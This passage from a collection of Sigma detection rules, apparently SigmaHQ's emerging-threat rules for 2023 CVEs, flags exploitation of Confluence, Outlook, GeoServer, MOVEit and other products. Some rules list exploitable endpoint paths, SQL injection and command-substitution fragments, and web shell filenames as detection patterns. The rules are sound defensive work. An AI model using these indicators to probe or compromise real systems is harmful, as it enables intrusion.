- 'cisco_support'\n        - 'cisco_sys_manager'\n    condition: keyword_event and keyword_user\nfalsepositives:\n    - Rare false positives might occur if there are valid users named \"cisco_tac_admin\" or \"cisco_support\", which are not created by default or CISCO representatives\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-21554/win_cve_2023_21554_msmq_corrupted_packet.yml",
    "content": "title: MSMQ Corrupted Packet Encountered\nid: ae94b10d-fee9-4767-82bb-439b309d5a27\nstatus: test\ndescription: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation\nreferences:\n    - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-21\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'MSMQ'\n        EventID: 2027\n        Level: 2\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_lnx_exploit_cve_2023_22518_confluence_java_child_proc.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)\nid: f8987c03-4290-4c96-870f-55e75ee377f4\nrelated:\n    - id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_parent:\n        ParentImage|endswith: '/java'\n        ParentCommandLine|contains: 'confluence'\n    selection_child:\n        # Only children associated with known campaigns\n        Image|endswith:\n            - '/bash'\n            - '/curl'\n            - '/echo'\n            - '/wget'\n    filter_main_ulimit:\n        CommandLine|contains: 'ulimit -u'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)\nid: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db\nrelated:\n    - id: f8987c03-4290-4c96-870f-55e75ee377f4\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\tomcat8.exe'\n            - '\\tomcat9.exe'\n            - '\\tomcat10.exe'\n        ParentCommandLine|contains: 'confluence'\n    selection_child:\n        # Note: Only children associated with known campaigns\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/proxy_exploit_cve_2023_22518_confluence_auth_bypass.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)\nid: 27d2cdde-9778-490e-91ec-9bd0be6e8cc6\nrelated:\n    - id: a902d249-9b9c-4dc4-8fd0-fbe528ef965c\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection_method:\n        cs-method: 'POST'\n    selection_uris:\n        cs-uri|contains:\n          # Exploitable endpoints\n            - '/json/setup-restore-local.action'\n            - '/json/setup-restore-progress.action'\n            - '/json/setup-restore.action'\n            - '/server-info.action'\n            - '/setup/setupadministrator.action'\n    selection_status:\n        # Response code may be indicative of exploitation success, but is not always the case\n        sc-status:\n            - 200\n            - 302\n            - 405\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/web_exploit_cve_2023_22518_confluence_auth_bypass.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)\nid: a902d249-9b9c-4dc4-8fd0-fbe528ef965c\nrelated:\n    - id: 27d2cdde-9778-490e-91ec-9bd0be6e8cc6\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_method:\n        cs-method: 'POST'\n    selection_uris:\n        cs-uri-query|contains:\n          # Exploitable endpoints\n            - '/json/setup-restore-local.action'\n            - '/json/setup-restore-progress.action'\n            - '/json/setup-restore.action'\n            - '/server-info.action'\n            - '/setup/setupadministrator.action'\n    selection_status:\n        # Response code may be indicative of exploitation success, but is not always the case\n        sc-status:\n            - 200\n            - 302\n            - 405\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-2283/lnx_sshd_exploit_cve_2023_2283_libssh_authentication_bypass.yml",
    "content": "title: Potential CVE-2023-2283 Exploitation\nid: 8b244735-5833-4517-a45b-28d8c63924c0\nstatus: test\ndescription: Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.\nreferences:\n    - https://twitter.com/kevin_backhouse/status/1666459308941357056?s=20\n    - https://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-2283\n    - https://www.blumira.com/cve-2023-2283/\n    - https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-2283\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    service: sshd\ndetection:\n    keywords:\n        - 'Failed to generate curve25519 keys'\n    condition: keywords\nfalsepositives:\n    - Errors with the initialization or generation of the X25519 elliptic curve keys may generate the same error message\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml",
    "content": "title: Outlook Task/Note Reminder Received\nid: fc06e655-d98c-412f-ac76-05c2698b1cb2\nstatus: test\ndescription: Detects changes to the registry values related to outlook that indicate that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-05\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137\n    - cve.2023-23397\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Office\\'\n            - '\\Outlook\\'\n        TargetObject|contains:\n            - '\\Tasks\\'\n            - '\\Notes\\'\n    condition: selection\nfalsepositives:\n    - Legitimate reminders received for a task or a note will also trigger this rule.\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml",
    "content": "title: CVE-2023-23397 Exploitation Attempt\nid: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c\nstatus: test\ndescription: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.\nauthor: Robert Lee @quantum_cookie\ndate: 2023-03-16\nmodified: 2023-03-22\nreferences:\n    - https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/\ntags:\n    - attack.credential-access\n    - attack.initial-access\n    - cve.2023-23397\n    - detection.emerging-threats\nlogsource:\n    service: security\n    product: windows\n    definition: 'Requirements: SACLs must be enabled for \"Query Value\" on the registry keys used in this rule'\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ProcessName|endswith: '\\OUTLOOK.EXE'\n        # Example: \\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\WebClient\\NetworkProvider\n        ObjectName|contains|all:\n            - '\\REGISTRY\\MACHINE\\SYSTEM'\n            - 'Services\\'\n        ObjectName|endswith:\n            - 'WebClient\\NetworkProvider'\n            - 'LanmanWorkstation\\NetworkProvider'\n        AccessList|contains: '%%4416' # \"Query key value\"\n    condition: selection\nfalsepositives:\n    - Searchprotocolhost.exe likes to query these registry keys. To avoid false positives, it's better to filter out those events before they reach the SIEM\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml",
    "content": "title: Potential CVE-2023-23397 Exploitation Attempt - SMB\nid: de96b824-02b0-4241-9356-7e9b47f04bac\nstatus: test\ndescription: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\n    - https://github.com/nasbench/Misc-Research/blob/fc46f6da34ff7e0076da28fd3e66d6e1100f1c2f/ETW/Microsoft-Windows-SMBClient.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-05\nmodified: 2025-10-13\ntags:\n    - attack.exfiltration\n    - cve.2023-23397\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: smbclient-connectivity\ndetection:\n    selection:\n        # Author Note: You could adapt this rule to use the \"ServerName\" field and uncomment the commented EventIDs. But you need to provide your own filter for \"trusted server names\"\n        EventID:\n            # - 30800 # The server name cannot be resolved. (Doesn't contain the \"ServerAddress\" field)\n            - 30803 # Failed to establish a network connection.\n            - 30804 # A network connection was disconnected.\n            - 30806 # The client re-established its session to the server.\n            # - 31001 # Error (Doesn't contain the \"ServerAddress\" field)\n    filter_main_local_ips:\n        - ServerAddress|cidr:\n              # IPv4\n              - '10.0.0.0/8'\n              - '127.0.0.0/8'\n              - '169.254.0.0/16'\n              - '172.16.0.0/12'\n              - '192.168.0.0/16'\n              # IPv6\n              - '::1/128'  # IPv6 loopback\n              - 'fe80::/10'  # IPv6 link-local addresses\n              - 'fc00::/7'  # IPv6 private addresses\n        - Address|startswith:\n        # This is for EventID 30804, which doesn't have the \"ServerAddress\" field, but a field called \"Address\" and it contains a socket address (IP:Port) and not an IP\n              # IPv4\n              - '10.'\n              - '127.'\n              - '169.254.'\n              - '172.'\n              - '192.168.'\n              # IPv6\n              - '::1'\n              - 'fe80::'\n              - 'fc00::'\n        # The filters below cover the XML raw log\n        - Address|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 private addresses\n              # IPv4\n              # The \"?\" are meant to represent the port\n              - '0200????C0A8' # 192.168.\n              - '0200????AC' # 172.\n              - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n        - ServerAddress|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 private addresses\n              # IPv4\n              # The \"?\" are meant to represent the port\n              - '0200????C0A8' # 192.168.\n              - '0200????AC' # 172.\n              - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n        - RemoteAddress|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 private addresses\n              # IPv4\n              # The \"?\" are meant to represent the port\n              - '0200????C0A8' # 192.168.\n              - '0200????AC' # 172.\n              - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives may occur from external trusted servers. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23752/web_cve_2023_23752_joomla_exploit_attempt.yml",
    "content": "title: Potential CVE-2023-23752 Exploitation Attempt\nid: 0e1ebc5a-15d0-4bf6-8199-b2535397433a\nstatus: test\ndescription: Detects a potential exploitation attempt of CVE-2023-23752, an improper access check in web service endpoints of Joomla\nreferences:\n    - https://xz.aliyun.com/t/12175\n    - https://twitter.com/momika233/status/1626464189261942786\nauthor: Bhabesh Raj\ndate: 2023-02-23\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-23752\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/api/index.php/v1/'\n            - 'public=true'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-25157/web_cve_2023_25157_geoserver_sql_injection.yml",
    "content": "title: Potential CVE-2023-25157 Exploitation Attempt\nid: c0341543-5ed0-4475-aabc-7eea8c52aa66\nstatus: test\ndescription: Detects a potential exploitation attempt of CVE-2023-25157, a SQL injection in GeoServer\nreferences:\n    - https://github.com/win3zz/CVE-2023-25157\n    - https://twitter.com/parzel2/status/1665726454489915395\n    - https://github.com/advisories/GHSA-7g5f-wrx8-5ccf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.initial-access\n    - cve.2023-25157\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_url:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/geoserver/ows'\n            - 'CQL_FILTER='\n        cs-uri-query|contains:\n            # Abusable filters/functions as reported in the advisory\n            - 'PropertyIsLike'\n            - 'strEndsWith'\n            - 'strStartsWith'\n            - 'FeatureId'\n            - 'jsonArrayContains'\n            - 'DWithin'\n    selection_payload:\n        cs-uri-query|contains:\n            - '+--'\n            - '+AS+'\n            - '+OR+'\n            - 'FROM'\n            - 'ORDER+BY'\n            - 'SELECT'\n            - 'sleep%28'\n            - 'substring%28'\n            - 'UNION'\n            - 'WHERE'\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-25717/web_cve_2023_25717_ruckus_wireless_admin_exploit_attempt.yml",
    "content": "title: Potential CVE-2023-25717 Exploitation Attempt\nid: 043c1609-0e32-4462-a6f2-5a0c2da3fafe\nstatus: test\ndescription: Detects a potential exploitation attempt of CVE-2023-25717, a remote code execution via an unauthenticated HTTP GET request in Ruckus Wireless Admin\nreferences:\n    - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-30\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-25717\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/forms/doLogin'\n            - 'login_username'\n            - 'password'\n        cs-uri-query|contains:\n            - '$('\n            - '%24%28' # URL-encoded version of \"$(\"\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\n    - Some rare false positives may occur if the password contains the characters \"$(\". Apply additional indicators such as executed commands to remove them\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml",
    "content": "title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader\nid: 9cae055f-e1d2-4f81-b8a5-1986a68cdd84\nstatus: test\ndescription: Detects suspicious \".hta\" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.\nreferences:\n    - https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363\n    - https://www.zerodayinitiative.com/advisories/ZDI-23-491/\n    - https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/\nauthor: Gregory\ndate: 2023-10-11\ntags:\n    - attack.persistence\n    - attack.t1505.001\n    - cve.2023-27363\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\FoxitPDFReader.exe'\n        TargetFilename|contains: '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n        TargetFilename|endswith: '.hta'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-27997/web_cve_2023_27997_pre_authentication_rce.yml",
    "content": "title: Potential CVE-2023-27997 Exploitation Indicators\nid: 31e4e649-7394-4fd2-9ae7-dbc61eebb550\nstatus: test\ndescription: |\n    Detects indicators of potential exploitation of CVE-2023-27997 in Fortigate web logs.\n    To reduce false positives, look for successive requests to the endpoints mentioned as well as unusual values of the \"enc\" parameter\nreferences:\n    - https://blog.lexfo.fr/Forensics-xortigate-notice.html\n    - https://blog.lexfo.fr/xortigate-cve-2023-27997.html\n    - https://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/\n    - https://labs.watchtowr.com/xortigate-or-cve-2023-27997/\nauthor: Sergio Palacios Dominguez, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-27997\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_uri:\n        cs-method:\n            - 'GET'\n            - 'POST'\n        cs-uri-query|contains:\n            - '/remote/hostcheck_validate'\n            - '/remote/logincheck'\n    selection_keywords:\n        - 'enc='\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/README.md",
    "content": "# MOVEit Transfer Critical Vulnerability (May 2023)\n\n## Summary\n\nProgress has discovered a vulnerability in MOVEit Transfer (CVE-2023-34362) that could lead to escalated privileges and potential unauthorized access to the environment.\n\nYou can find more information on the threat in the following articles:\n\n- [New MOVEit Transfer zero-day mass-exploited in data theft attacks](https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/)\n- [MOVEit Transfer Critical Vulnerability (May 2023)](https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023)\n- [Rapid7 Observed Exploitation of Critical MOVEit Transfer Vulnerability](https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/)\n- [CRITICAL VULNERABILITY IN PROGRESS MOVEIT TRANSFER: TECHNICAL ANALYSIS AND RECOMMENDATIONS - TrustedSec](https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/)\n- [MOVEit Transfer Critical Vulnerability Rapid Response - Huntress](https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response)\n\n## Rules\n\n- [Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity](./file_event_win_exploit_cve_2023_34362_moveit_transfer.yml)\n- [Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE](./proc_creation_win_exploit_cve_2023_34362_moveit_transfer_exploitation_activity.yml)\n- [MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request](./web_cve_2023_34362_known_payload_request.yml.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml",
    "content": "title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity\nid: c3b2a774-3152-4989-83c1-7afc48fd1599\nstatus: test\ndescription: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/\n    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023\n    - https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/\n    - https://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\nmodified: 2024-08-13\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-34362\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        TargetFilename|contains:\n            - '\\MOVEit Transfer\\wwwroot\\'\n            - '\\MOVEitTransfer\\wwwroot\\'\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.ps1'\n            - '.rar'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    selection_known_ioc:\n        TargetFilename|endswith:\n            - '\\MOVEit Transfer\\wwwroot\\_human2.aspx.lnk'\n            - '\\MOVEit Transfer\\wwwroot\\_human2.aspx'\n            - '\\MOVEit Transfer\\wwwroot\\human2.aspx.lnk'\n            - '\\MOVEit Transfer\\wwwroot\\human2.aspx'\n            - '\\MOVEitTransfer\\wwwroot\\_human2.aspx.lnk'\n            - '\\MOVEitTransfer\\wwwroot\\_human2.aspx'\n            - '\\MOVEitTransfer\\wwwroot\\human2.aspx.lnk'\n            - '\\MOVEitTransfer\\wwwroot\\human2.aspx'\n    # Uncomment the selection below to hunt for additional artifacts\n    # selection_cmdline:\n    #    TargetFilename|contains: ':\\Windows\\TEMP\\'\n    #    TargetFilename|endswith: '.cmdline'\n    selection_compiled_asp:\n        CreationUtcTime|startswith:\n            - '2023-03-'\n            - '2023-04-'\n            - '2023-05-'\n            - '2023-06-'\n        TargetFilename|contains|all:\n            - '\\Windows\\Microsoft.net\\Framework64\\v'\n            - '\\Temporary ASP.NET Files\\'\n            - 'App_Web_'\n        TargetFilename|endswith: '.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - To avoid false positives, this rule should only be applied on MOVEit servers.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/proc_creation_win_exploit_cve_2023_34362_moveit_transfer_exploitation_activity.yml",
    "content": "title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE\nid: 39ac1fb0-07f1-474b-b97e-c5c0eace0d79\nstatus: test\ndescription: |\n    Detects the execution of \"csc.exe\" as a child of the \"w3wp.exe\" IIS worker process that serves the MOVEit application pool. Hosts affected by MOVEit CVE-2023-34362 execute \"csc.exe\" via \"w3wp.exe\" to dynamically compile malicious DLL files.\n\n    Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\\\Windows\\\\Microsoft\\.NET\\\\Framework64\\\\v4\\.0\\.30319\\\\Temporary ASP\\.NET Files\\\\root\\\\([a-z0-9]{5,12})\\\\([a-z0-9]{5,12})\\\\App_Web_[a-z0-9]{5,12}\\.dll.\n\n    Hunting Opportunity\n\n    Events where IIS dynamically compiles binaries via \"csc.exe\" on behalf of the MOVEit application, especially from May 27th 2023 onwards, should be investigated.\nreferences:\n    - https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response\n    - https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/\nauthor: '@kostastsale'\ndate: 2023-06-01\ntags:\n    - attack.execution\n    - attack.t1059\n    - cve.2023-34362\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\w3wp.exe'\n        ParentCommandLine|contains: 'moveitdmz pool'\n        Image|endswith: '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - Initial software installation and software updates.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/web_cve_2023_34362_known_payload_request.yml.yml",
    "content": "title: MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request\nid: 435e41f2-48eb-4c95-8a2b-ed24b50ec30b\nstatus: test\ndescription: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362\nreferences:\n    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023\n    - https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-03\nmodified: 2023-07-28\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - cve.2023-34362\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem|contains:\n            - '/human2.aspx'\n            - '/_human2.aspx'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml",
    "content": "title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location\nid: 92389a99-5215-43b0-a09f-e334453b2ed3\nstatus: test\ndescription: Detects the creation of a \"Report.wer\" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.\nreferences:\n    - https://github.com/Wh04m1001/CVE-2023-36874\n    - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-23\ntags:\n    - attack.execution\n    - cve.2023-36874\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: ':\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\'\n        TargetFilename|endswith: '\\Report.wer'\n    filter_main_locations:\n        TargetFilename|contains:\n            # Note: This list is not exhaustive. Use it as a starting point for hunting for suspicious report folders\n            - '\\ReportArchive\\AppCrash_'\n            - '\\ReportArchive\\AppHang_'\n            - '\\ReportArchive\\Critical_'\n            - '\\ReportArchive\\Kernel_'\n            - '\\ReportArchive\\NonCritical_'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml",
